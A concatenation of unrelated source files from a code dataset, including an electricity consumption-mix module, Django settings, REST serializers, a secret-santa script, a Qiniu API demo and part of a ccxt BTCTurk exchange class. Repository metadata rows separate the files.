df_final_trade_out_filt=df_final_trade_out_filt.loc[keep_rows,keep_cols]
col_list = df_final_trade_out_filt.columns.tolist()
for i in col_list:
df_final_trade_out_filt[i] = np.where(df_final_trade_out_filt[i].abs()/df_final_trade_out_filt[i].sum() < 0.00001, 0, df_final_trade_out_filt[i].abs())
df_final_trade_out_filt = df_final_trade_out_filt.reset_index()
df_final_trade_out_filt = df_final_trade_out_filt.rename(columns = {'index':'Source BAA'})
df_final_trade_out_filt_melted = df_final_trade_out_filt.melt(id_vars = 'Source BAA' , value_vars=col_list)
df_final_trade_out_filt_melted = df_final_trade_out_filt_melted.rename(columns = {'Source BAA':'export BAA', 'variable':'import BAA'})
# Merge to bring in import region name matched with BAA
df_final_trade_out_filt_melted_merge = df_final_trade_out_filt_melted.merge(df_BA_NA, left_on = 'import BAA', right_on = 'BA_Acronym')
df_final_trade_out_filt_melted_merge.rename(columns={'FERC_Region': 'import ferc region', 'FERC_Region_Abbr':'import ferc region abbr'}, inplace=True)
df_final_trade_out_filt_melted_merge.drop(columns = ['BA_Acronym', 'BA_Name', 'NCR ID#', 'EIA_Region', 'EIA_Region_Abbr'], inplace = True)
# Merge to bring in export region name matched with BAA
df_final_trade_out_filt_melted_merge = df_final_trade_out_filt_melted_merge.merge(df_BA_NA, left_on = 'export BAA', right_on = 'BA_Acronym')
if regions_to_keep is not None:
# module_logger.info(f"{regions_to_keep}")
# module_logger.info(f"{df_final_trade_out_filt_melted_merge['BA_Name'].unique()}")
df_final_trade_out_filt_melted_merge=df_final_trade_out_filt_melted_merge.loc[df_final_trade_out_filt_melted_merge["BA_Name"].isin(regions_to_keep),:]
df_final_trade_out_filt_melted_merge.rename(columns={'FERC_Region': 'export ferc region', 'FERC_Region_Abbr':'export ferc region abbr'}, inplace=True)
df_final_trade_out_filt_melted_merge.drop(columns = ['BA_Acronym', 'BA_Name', 'NCR ID#', 'EIA_Region', 'EIA_Region_Abbr'], inplace = True)
# if subregion == 'BA':
# Develop final df for BAA
BAA_import_grouped_tot = df_final_trade_out_filt_melted_merge.groupby(['import BAA'])['value'].sum().reset_index()
BAA_final_trade = df_final_trade_out_filt_melted_merge.copy()
BAA_final_trade = BAA_final_trade.drop(columns = ['import ferc region', 'export ferc region', 'import ferc region abbr', 'export ferc region abbr'])
BAA_final_trade = BAA_final_trade.merge(BAA_import_grouped_tot, left_on = 'import BAA', right_on = 'import BAA')
BAA_final_trade = BAA_final_trade.rename(columns = {'value_x':'value','value_y':'total'})
BAA_final_trade['fraction'] = BAA_final_trade['value']/BAA_final_trade['total']
BAA_final_trade = BAA_final_trade.fillna(value = 0)
BAA_final_trade = BAA_final_trade.drop(columns = ['value', 'total'])
# Remove Canadian BAs in import list
BAA_filt = BAA_final_trade['import BAA'].isin(eia860_bas)
BAA_final_trade = BAA_final_trade[BAA_filt]
# There are some BAs that will have 0 trade. Some of these are legitimate
# Alcoa Yadkin has no demand (i.e., all power generation is exported) others
# seem to be errors. For those BAs with actual demand, we'll set the
# consumption mix to 100% from that BA. For those without demand,
# fraction will be set to near 0 just to make sure systems can be built
# in openLCA
BAA_zero_trade = [x for x in list(BAA_final_trade["import BAA"].unique()) if BAA_final_trade.loc[BAA_final_trade["import BAA"]==x,"fraction"].sum()==0]
BAAs_from_zero_trade_with_demand = []
for d_row in DEMAND_ROWS:
if d_row["series_id"].split('.')[1].split('-')[0] in BAA_zero_trade:
BAAs_from_zero_trade_with_demand.append(d_row["series_id"].split('.')[1].split('-')[0])
BAAs_from_zero_trade_with_demand = list(set(BAAs_from_zero_trade_with_demand))
del(DEMAND_ROWS)
for baa in BAAs_from_zero_trade_with_demand:
BAA_final_trade.at[(BAA_final_trade["import BAA"]==baa)&(BAA_final_trade["export BAA"]==baa),"fraction"]=1
for baa in list(set(BAA_zero_trade)-set(BAAs_from_zero_trade_with_demand)):
BAA_final_trade.at[(BAA_final_trade["import BAA"]==baa)&(BAA_final_trade["export BAA"]==baa),"fraction"]=1E-15
#Was later decided to not create consumption mixes for BAs that don't have imports.
BAA_final_trade.drop(BAA_final_trade[BAA_final_trade["import BAA"]==baa].index,inplace=True)
BAA_final_trade.to_csv(output_dir + '/BAA_final_trade_{}.csv'.format(year))
BAA_final_trade["export_name"]=BAA_final_trade["export BAA"].map(df_BA_NA[["BA_Acronym","BA_Name"]].set_index("BA_Acronym")["BA_Name"])
BAA_final_trade["import_name"]=BAA_final_trade["import BAA"].map(df_BA_NA[["BA_Acronym","BA_Name"]].set_index("BA_Acronym")["BA_Name"])
# return BAA_final_trade
# elif subregion == 'FERC':
ferc_import_grouped_tot = df_final_trade_out_filt_melted_merge.groupby(['import ferc region'])['value'].sum().reset_index()
# Develop final df for FERC Market Region
ferc_final_trade = df_final_trade_out_filt_melted_merge.copy()
# ferc_final_trade = ferc_final_trade.groupby(['import ferc region abbr', 'import ferc region', 'export ferc region','export ferc region abbr'])['value'].sum().reset_index()
ferc_final_trade = ferc_final_trade.groupby(['import ferc region abbr', 'import ferc region', 'export BAA'])['value'].sum().reset_index()
ferc_final_trade = ferc_final_trade.merge(ferc_import_grouped_tot, left_on = 'import ferc region', right_on = 'import ferc region')
ferc_final_trade = ferc_final_trade.rename(columns = {'value_x':'value','value_y':'total'})
ferc_final_trade['fraction'] = ferc_final_trade['value']/ferc_final_trade['total']
ferc_final_trade = ferc_final_trade.fillna(value = 0)
ferc_final_trade = ferc_final_trade.drop(columns = ['value', 'total'])
# Remove Canadian entry in import list
ferc_list.remove('CAN')
ferc_filt = ferc_final_trade['import ferc region abbr'].isin(ferc_list)
ferc_final_trade = ferc_final_trade[ferc_filt]
ferc_final_trade.to_csv(output_dir + '/ferc_final_trade_{}.csv'.format(year))
ferc_final_trade["export_name"]=ferc_final_trade["export BAA"].map(df_BA_NA[["BA_Acronym","BA_Name"]].set_index("BA_Acronym")["BA_Name"])
# return ferc_final_trade
# elif subregion== 'US':
us_import_grouped_tot = df_final_trade_out_filt_melted_merge['value'].sum()
us_final_trade = df_final_trade_out_filt_melted_merge.copy()
us_final_trade = us_final_trade.groupby(['export BAA'])['value'].sum().reset_index()
us_final_trade["fraction"]=us_final_trade["value"]/us_import_grouped_tot
us_final_trade = us_final_trade.fillna(value = 0)
us_final_trade=us_final_trade.drop(columns = ["value"])
us_final_trade["export_name"]=us_final_trade["export BAA"].map(df_BA_NA[["BA_Acronym","BA_Name"]].set_index("BA_Acronym")["BA_Name"])
# return us_final_trade
return {'BA':BAA_final_trade,'FERC':ferc_final_trade,'US':us_final_trade}
if __name__=='__main__':
year=2016
subregion = 'BA'
mix_df_dict = ba_io_trading_model(year, subregion)
def olca_schema_consumption_mix(database, gen_dict, subregion="BA"):
import numpy as np
import pandas as pd
from electricitylci.generation import eia_facility_fuel_region
from electricitylci.globals import data_dir, output_dir
from electricitylci.process_dictionary_writer import (
exchange_table_creation_ref,
exchange,
ref_exchange_creator,
electricity_at_user_flow,
electricity_at_grid_flow,
process_table_creation_con_mix,
exchange_table_creation_input_con_mix
)
import logging
# DELETE NEXT LINE
# database = cons_mix_df
# database = database.drop(columns = ['value', 'total'])
# dist_dict = dist_mix_dict
# DELETE ABOVE
consumption_mix_dict = {}
if subregion == "FERC":
aggregation_column = "import ferc region"
region = list(pd.unique(database[aggregation_column]))
export_column = 'export_name'
elif subregion == "BA":
aggregation_column = "import_name" # "import BAA"
region = list(pd.unique(database[aggregation_column]))
export_column = "export_name" # 'export BAA'
elif subregion == "US":
export_column = "export_name"
region=["US"]
for reg in region:
if subregion =="US":
database_reg = database
else:
database_reg = database.loc[database[aggregation_column] == reg, :]
exchanges_list = []
database_filt = database['fraction'] > 0
database_reg = database_reg[database_filt]
exchange(exchange_table_creation_ref_cons(database_reg), exchanges_list)
for export_region in list(database_reg[export_column].unique()):
database_f1 = database_reg[
database_reg[export_column] == export_region
]
if database_f1.empty != True:
ra = exchange_table_creation_input_con_mix(
database_f1, export_region
)
ra["quantitativeReference"] = False
ra['amount'] = database_reg.loc[database_reg[export_column] == export_region,'fraction'].values[0]
matching_dict = None
for gen in gen_dict:
if (
gen_dict[gen]["name"]
== 'Electricity; at grid; generation mix - ' + export_region
):
matching_dict = gen_dict[export_region]
break
if matching_dict is None:
logging.warning(
f"Trouble matching dictionary for {export_region} - {reg}"
)
else:
ra["provider"] = {
"name": matching_dict["name"],
"@id": matching_dict["uuid"],
"category": matching_dict["category"].split("/"),
}
exchange(ra, exchanges_list)
# Writing final file
final = process_table_creation_con_mix(reg, exchanges_list)
final["name"] = f"Electricity; at grid; consumption mix - {reg} - {subregion}"
consumption_mix_dict[f"{reg} - {subregion}"] = final
return consumption_mix_dict
| 49.516381
| 176
| 0.689351
|
4a0f2c0d62da25f1e7c20bee66da1d49a63e78a4
| 3,278
|
py
|
Python
|
pg/settings.py
|
KONAPAVANKUMAR/paying-guest-django
|
8646550b7c764728fa68a9fcdea2dab77851d36a
|
[
"MIT"
] | null | null | null |
pg/settings.py
|
KONAPAVANKUMAR/paying-guest-django
|
8646550b7c764728fa68a9fcdea2dab77851d36a
|
[
"MIT"
] | null | null | null |
pg/settings.py
|
KONAPAVANKUMAR/paying-guest-django
|
8646550b7c764728fa68a9fcdea2dab77851d36a
|
[
"MIT"
] | null | null | null |
"""
Django settings for pg project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-71g6&16zc+sow8$6z6%cr(jsni%6z$@^svr78!&z)n(c(i7enn'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'pgapp',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pg.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pg.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = ['static']
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| 25.811024
| 91
| 0.699512
|
4a0f2c58283cd7b006a3fd5f4480099fd0a27773
| 1,184
|
py
|
Python
|
setup.py
|
urschrei/Circles
|
5aab401b470935e816a28d7ba817eb72f9344672
|
[
"MIT"
] | 6
|
2017-08-25T04:30:10.000Z
|
2021-11-22T13:31:41.000Z
|
setup.py
|
urschrei/Circles
|
5aab401b470935e816a28d7ba817eb72f9344672
|
[
"MIT"
] | null | null | null |
setup.py
|
urschrei/Circles
|
5aab401b470935e816a28d7ba817eb72f9344672
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
setup.py
Created by Stephan Hügel on 2011-03-04
"""
from setuptools import setup, find_packages
setup(
name='Circles',
version='0.1',
description='Draw correctly-projected circles on a Basemap plot',
author='Stephan Hügel',
author_email='urschrei@gmail.com',
license='MIT',
url='https://github.com/urschrei/circles',
download_url='https://github.com/urschrei/circles/tarball/v0.1',
keywords=['basemap'],
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
],
packages=find_packages(),
install_requires=['numpy'],
long_description="""\
A convenience method for calculating circular coordinates for a given centre and radius.
These can be plotted on a Basemap instance, and will conform to its selected projection
"""
)
| 31.157895
| 89
| 0.657939
|
4a0f2cc76bf96dc6b93f336c10bf608ca5513547
| 2,085
|
py
|
Python
|
app/tempBerry/smarthome/rest/serializers.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | 2
|
2019-07-16T19:09:50.000Z
|
2020-01-03T09:06:46.000Z
|
app/tempBerry/smarthome/rest/serializers.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | null | null | null |
app/tempBerry/smarthome/rest/serializers.py
|
ChristianKreuzberger/tempBerry
|
d4a9fe543df57ebdb82d6ebf398607ccf9e6c0bf
|
[
"MIT"
] | 1
|
2020-02-09T22:46:05.000Z
|
2020-02-09T22:46:05.000Z
|
from rest_framework import serializers
from tempBerry.smarthome.models import Room, SmartHome, Sensor, AbstractDataEntry
class AbstractDataEntrySerializer(serializers.Serializer):
id = serializers.IntegerField()
source = serializers.CharField()
created_at = serializers.DateTimeField()
class SensorSerializer(serializers.ModelSerializer):
"""
Serializer for Sensors
"""
live_data = serializers.SerializerMethodField()
class Meta:
model = Sensor
fields = (
'id', 'name', 'created_at', 'last_updated_at', 'comment', 'public', 'type', 'live_data',
)
def get_live_data(self, obj):
if not hasattr(obj, 'live_data') or not obj.live_data:
return None
from tempBerry.temperatures.models import TemperatureDataEntry
from tempBerry.binarySensor.models import BinarySensorData
from tempBerry.temperatures.rest.serializers import TemperatureDataEntrySerializer
from tempBerry.binarySensor.rest.serializers import BinarySensorDataSerializer
# Convert into appropriate format
if isinstance(obj.live_data, TemperatureDataEntry):
return TemperatureDataEntrySerializer(obj.live_data).data
elif isinstance(obj.live_data, BinarySensorData):
return BinarySensorDataSerializer(obj.live_data).data
else:
return AbstractDataEntrySerializer(obj.live_data).data
class RoomSerializer(serializers.ModelSerializer):
"""
Serializer for rooms
"""
sensors = SensorSerializer(many=True)
class Meta:
model = Room
fields = ('id', 'name', 'comment', 'created_at', 'public', 'sensors',
'has_temperature', 'has_humidity', 'has_air_pressure')
read_only_fields = ('created_at', )
class MinimalisticSmartHomeSerializer(serializers.Serializer):
"""
Minimalistic Serializer for SmartHome
"""
id = serializers.IntegerField(read_only=True)
name = serializers.CharField(read_only=True)
description = serializers.CharField(read_only=True)
| 33.629032
| 100
| 0.703118
|
4a0f2d3956b2832281f8e133240d0d6c0da59a59
| 1,196
|
py
|
Python
|
secret_santa.py
|
codeocelot/secret-santa
|
57b5a43293f1d8e49e7516c73508ee50cc95ea7f
|
[
"Apache-2.0"
] | 1
|
2017-12-19T09:47:17.000Z
|
2017-12-19T09:47:17.000Z
|
secret_santa.py
|
codeocelot/secret-santa
|
57b5a43293f1d8e49e7516c73508ee50cc95ea7f
|
[
"Apache-2.0"
] | null | null | null |
secret_santa.py
|
codeocelot/secret-santa
|
57b5a43293f1d8e49e7516c73508ee50cc95ea7f
|
[
"Apache-2.0"
] | null | null | null |
from random import shuffle
class Person:
receive_from = None
send_to = None
def __init__(self, name):
self.name = name
def __repr__(self):
return "{}\n- giving to {}\n- receiving from {}\n".format(
self.name, self.send_to.name, self.receive_from.name)
def secret_santa(names):
"""
gist: create doubly linked list from names, with tail person giving to the
head person and the head person recieving from the tail.
"""
gifts = []
if not names or len(names) == 1:
raise Exception('invalid input')
shuffle(names)
for i, name in enumerate(names):
person = Person(name)
if i > 0:
person.send_to = gifts[i - 1]
gifts.append(person)
for person in gifts:
person.receive_from = next(
(p for p in gifts if p.send_to and p.send_to.name == person.name),
None)
gifts[0].send_to = gifts[-1]
gifts[-1].receive_from = gifts[0]
return gifts
if __name__ == "__main__":
matched_people = secret_santa(["john", "joey", "rory"])
[print("{} giving to {}".format(person.name, person.send_to.name))
for person in matched_people]
| 25.446809
| 78
| 0.60786
|
4a0f2da1e368a00c1f07f6b76d1ea60dfb9dff5c
| 1,048
|
py
|
Python
|
QVS_spaceManager/06_enableSpaces.py
|
yangjunren/QVS-API-demo
|
9d8cd1d12baefdbef57c479e02110a8540e6552c
|
[
"Apache-2.0"
] | null | null | null |
QVS_spaceManager/06_enableSpaces.py
|
yangjunren/QVS-API-demo
|
9d8cd1d12baefdbef57c479e02110a8540e6552c
|
[
"Apache-2.0"
] | null | null | null |
QVS_spaceManager/06_enableSpaces.py
|
yangjunren/QVS-API-demo
|
9d8cd1d12baefdbef57c479e02110a8540e6552c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from qiniu import QiniuMacAuth, http
import json
def disableNamespaces(access_key, secret_key, namespaceId):
"""
启用空间
https://developer.qiniu.com/qvs/api/6760/enable-the-space
:param access_key: 公钥
:param secret_key: 私钥
:param namespaceId: 空间ID
:return:
{
"code": 200
}
"""
auth = QiniuMacAuth(access_key, secret_key)
# 请求URL
url = f"http://qvs.qiniuapi.com/v1/namespaces/{namespaceId}/enabled"
# 发起POST请求
ret, res = http._post_with_qiniu_mac(url, None, auth=auth)
headers = {"code": res.status_code, "reqid": res.req_id, "xlog": res.x_log}
# 格式化响应体
Headers = json.dumps(headers, indent=4, ensure_ascii=False)
result = json.dumps(ret, indent=4, ensure_ascii=False)
return Headers, result
# 七牛账号 AK、SK
access_key = '<access_key>'
secret_key = '<secret_key>'
# 需要查询的空间ID
namespaceId = "2xenzw02hisz2"
headers, result = disableNamespaces(access_key, secret_key, namespaceId)
print(f'{headers}\n{result}')
| 24.372093
| 79
| 0.660305
|
4a0f2dd8872e6eac1068a7967bc8e34f650143e4
| 2,091
|
py
|
Python
|
strips_sat_x_1_10.py
|
connorescajeda/sat
|
b121c8fba702f09204864f9aade1e813a10397d2
|
[
"Apache-2.0"
] | null | null | null |
strips_sat_x_1_10.py
|
connorescajeda/sat
|
b121c8fba702f09204864f9aade1e813a10397d2
|
[
"Apache-2.0"
] | null | null | null |
strips_sat_x_1_10.py
|
connorescajeda/sat
|
b121c8fba702f09204864f9aade1e813a10397d2
|
[
"Apache-2.0"
] | null | null | null |
from pyhop_anytime import *
global state, goals
state = State('state')
state.calibration_target = Oset([('instrument0','star1'),('instrument1','groundstation3'),('instrument10','star0'),('instrument2','groundstation3'),('instrument3','star4'),('instrument4','star2'),('instrument5','star0'),('instrument6','groundstation3'),('instrument7','star4'),('instrument8','star4'),('instrument9','star2')])
state.on_board = Oset([('instrument0','satellite0'),('instrument1','satellite0'),('instrument10','satellite4'),('instrument2','satellite1'),('instrument3','satellite1'),('instrument4','satellite2'),('instrument5','satellite2'),('instrument6','satellite3'),('instrument7','satellite3'),('instrument8','satellite4'),('instrument9','satellite4')])
state.pointing = Oset([('satellite0','star0'),('satellite1','star4'),('satellite2','star1'),('satellite3','groundstation3'),('satellite4','planet10')])
state.power_avail = Oset(['satellite0','satellite1','satellite2','satellite3','satellite4'])
state.supports = Oset([('instrument0','image4'),('instrument1','infrared0'),('instrument1','spectrograph1'),('instrument10','image2'),('instrument10','image4'),('instrument2','image2'),('instrument2','infrared0'),('instrument3','infrared0'),('instrument3','infrared3'),('instrument4','image4'),('instrument4','infrared0'),('instrument4','spectrograph1'),('instrument5','image2'),('instrument5','infrared0'),('instrument5','infrared3'),('instrument6','infrared0'),('instrument6','infrared3'),('instrument7','image4'),('instrument7','infrared3'),('instrument7','spectrograph1'),('instrument8','image4'),('instrument8','spectrograph1'),('instrument9','infrared3')])
state.calibrated = Oset()
state.have_image = Oset()
state.power_on = Oset()
goals = State('goals')
goals.have_image = Oset([('phenomenon13','image4'),('phenomenon14','spectrograph1'),('phenomenon8','image4'),('planet10','infrared3'),('planet5','image4'),('planet9','infrared0'),('star12','image4'),('star15','spectrograph1'),('star16','image2'),('star6','infrared3'),('star7','image4')])
goals.pointing = Oset([('satellite4','planet9')])
| 123
| 662
| 0.705882
|
4a0f2df2fe0888b48ba7a886e73b1d1d7832f07d
| 197
|
py
|
Python
|
src/djangoreactredux/djangoreactreduxenv/bin/django-admin.py
|
m2jobe/tafseer
|
8f7d4bddbcd8a73c607f39a2b1d27c78aef86a15
|
[
"MIT"
] | null | null | null |
src/djangoreactredux/djangoreactreduxenv/bin/django-admin.py
|
m2jobe/tafseer
|
8f7d4bddbcd8a73c607f39a2b1d27c78aef86a15
|
[
"MIT"
] | null | null | null |
src/djangoreactredux/djangoreactreduxenv/bin/django-admin.py
|
m2jobe/tafseer
|
8f7d4bddbcd8a73c607f39a2b1d27c78aef86a15
|
[
"MIT"
] | null | null | null |
#!/home/muhammed/Documents/tm/tafseer/src/djangoreactredux/djangoreactreduxenv/bin/python2
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| 32.833333
| 90
| 0.817259
|
4a0f2f0ee72ca7514e6950d49503068107c0d649
| 150
|
py
|
Python
|
vetstore/vetstore/doctype/purchase_invoices/test_purchase_invoices.py
|
UsamaNaveed9/vetstore
|
cea6d44e405549b37fc8da20311836a8513c0af8
|
[
"MIT"
] | null | null | null |
vetstore/vetstore/doctype/purchase_invoices/test_purchase_invoices.py
|
UsamaNaveed9/vetstore
|
cea6d44e405549b37fc8da20311836a8513c0af8
|
[
"MIT"
] | null | null | null |
vetstore/vetstore/doctype/purchase_invoices/test_purchase_invoices.py
|
UsamaNaveed9/vetstore
|
cea6d44e405549b37fc8da20311836a8513c0af8
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021, Usama and Contributors
# See license.txt
# import frappe
import unittest
class TestPurchaseInvoices(unittest.TestCase):
pass
| 16.666667
| 46
| 0.786667
|
4a0f2fa405ee9923f9035119da40d6f4b2e26506
| 397
|
py
|
Python
|
thanosback/wsgi.py
|
ashik4715/thanosback
|
08db204dbda2672dd5a53c577c12899f39e73af0
|
[
"Apache-2.0"
] | null | null | null |
thanosback/wsgi.py
|
ashik4715/thanosback
|
08db204dbda2672dd5a53c577c12899f39e73af0
|
[
"Apache-2.0"
] | null | null | null |
thanosback/wsgi.py
|
ashik4715/thanosback
|
08db204dbda2672dd5a53c577c12899f39e73af0
|
[
"Apache-2.0"
] | null | null | null |
"""
WSGI config for thanosback project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'thanosback.settings')
application = get_wsgi_application()
| 23.352941
| 78
| 0.788413
|
4a0f307a701cb59bb2126716cab28fe4ef295583
| 24,157
|
py
|
Python
|
python/ccxt/btcturk.py
|
DavidFelsen/ccxt
|
6497b7da13d2ea3a9e56207b46b8691938b07839
|
[
"MIT"
] | 2
|
2021-04-15T22:12:33.000Z
|
2021-09-04T05:29:32.000Z
|
python/ccxt/btcturk.py
|
DavidFelsen/ccxt
|
6497b7da13d2ea3a9e56207b46b8691938b07839
|
[
"MIT"
] | 1
|
2021-08-23T16:27:34.000Z
|
2021-08-23T16:27:34.000Z
|
python/ccxt/btcturk.py
|
DavidFelsen/ccxt
|
6497b7da13d2ea3a9e56207b46b8691938b07839
|
[
"MIT"
] | 2
|
2020-09-08T01:41:24.000Z
|
2021-04-30T00:07:59.000Z
|
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import hashlib
import math
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.precise import Precise
class btcturk(Exchange):
def describe(self):
return self.deep_extend(super(btcturk, self).describe(), {
'id': 'btcturk',
'name': 'BTCTurk',
'countries': ['TR'], # Turkey
'rateLimit': 1000,
'has': {
'cancelOrder': True,
'CORS': True,
'createOrder': True,
'fetchBalance': True,
'fetchMarkets': True,
'fetchOHLCV': True,
'fetchOrderBook': True,
'fetchOpenOrders': True,
'fetchOrders': True,
'fetchTicker': True,
'fetchTickers': True,
'fetchTrades': True,
'fetchMyTrades': True,
},
'timeframes': {
'1d': '1d',
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87153926-efbef500-c2c0-11ea-9842-05b63612c4b9.jpg',
'api': {
'public': 'https://api.btcturk.com/api/v2',
'private': 'https://api.btcturk.com/api/v1',
'graph': 'https://graph-api.btcturk.com/v1',
},
'www': 'https://www.btcturk.com',
'doc': 'https://github.com/BTCTrader/broker-api-docs',
},
'api': {
'public': {
'get': [
'orderbook',
'ticker',
'trades', # ?last=COUNT(max 50)
'server/exchangeinfo',
],
},
'private': {
'get': [
'users/balances',
'openOrders',
'allOrders',
'users/transactions/trade',
],
'post': [
'order',
'cancelOrder',
],
'delete': [
'order',
],
},
'graph': {
'get': [
'ohlcs',
],
},
},
'fees': {
'trading': {
'maker': self.parse_number('0.0005'),
'taker': self.parse_number('0.0009'),
},
},
'exceptions': {
'exact': {
'FAILED_ORDER_WITH_OPEN_ORDERS': InsufficientFunds,
'FAILED_LIMIT_ORDER': InvalidOrder,
'FAILED_MARKET_ORDER': InvalidOrder,
},
},
})
def fetch_markets(self, params={}):
response = self.publicGetServerExchangeinfo(params)
#
# {
# "data": {
# "timeZone": "UTC",
# "serverTime": "1618826678404",
# "symbols": [
# {
# "id": "1",
# "name": "BTCTRY",
# "nameNormalized": "BTC_TRY",
# "status": "TRADING",
# "numerator": "BTC",
# "denominator": "TRY",
# "numeratorScale": "8",
# "denominatorScale": "2",
# "hasFraction": False,
# "filters": [
# {
# "filterType": "PRICE_FILTER",
# "minPrice": "0.0000000000001",
# "maxPrice": "10000000",
# "tickSize": "10",
# "minExchangeValue": "99.91",
# "minAmount": null,
# "maxAmount": null
# }
# ],
# "orderMethods": [
# "MARKET",
# "LIMIT",
# "STOP_MARKET",
# "STOP_LIMIT"
# ],
# "displayFormat": "#,###",
# "commissionFromNumerator": False,
# "order": "1000",
# "priceRounding": False
# },
# },
# ],
# }
#
data = self.safe_value(response, 'data')
markets = self.safe_value(data, 'symbols', [])
result = []
for i in range(0, len(markets)):
entry = markets[i]
id = self.safe_string(entry, 'name')
baseId = self.safe_string(entry, 'numerator')
quoteId = self.safe_string(entry, 'denominator')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
filters = self.safe_value(entry, 'filters')
minPrice = None
maxPrice = None
minAmount = None
maxAmount = None
minCost = None
for j in range(0, len(filters)):
filter = filters[j]
filterType = self.safe_string(filter, 'filterType')
if filterType == 'PRICE_FILTER':
minPrice = self.safe_number(filter, 'minPrice')
maxPrice = self.safe_number(filter, 'maxPrice')
minAmount = self.safe_number(filter, 'minAmount')
maxAmount = self.safe_number(filter, 'maxAmount')
minCost = self.safe_number(filter, 'minExchangeValue')
status = self.safe_string(entry, 'status')
active = status == 'TRADING'
limits = {
'price': {
'min': minPrice,
'max': maxPrice,
},
'amount': {
'min': minAmount,
'max': maxAmount,
},
'cost': {
'min': minCost,
'max': None,
},
}
precision = {
'price': self.safe_integer(entry, 'denominatorScale'),
'amount': self.safe_integer(entry, 'numeratorScale'),
}
result.append({
'info': entry,
'symbol': symbol,
'id': id,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'limits': limits,
'precision': precision,
'active': active,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetUsersBalances(params)
#
# {
# "data": [
# {
# "asset": "TRY",
# "assetname": "Türk Lirası",
# "balance": "0",
# "locked": "0",
# "free": "0",
# "orderFund": "0",
# "requestFund": "0",
# "precision": 2
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
result = {
'info': response,
'timestamp': None,
'datetime': None,
}
for i in range(0, len(data)):
entry = data[i]
currencyId = self.safe_string(entry, 'asset')
code = self.safe_currency_code(currencyId)
account = self.account()
account['total'] = self.safe_string(entry, 'balance')
account['free'] = self.safe_string(entry, 'free')
account['used'] = self.safe_string(entry, 'locked')
result[code] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'pairSymbol': market['id'],
}
response = self.publicGetOrderbook(self.extend(request, params))
# {
# "data": {
# "timestamp": 1618827901241,
# "bids": [
# [
# "460263.00",
# "0.04244000"
# ]
# ]
# }
# }
data = self.safe_value(response, 'data')
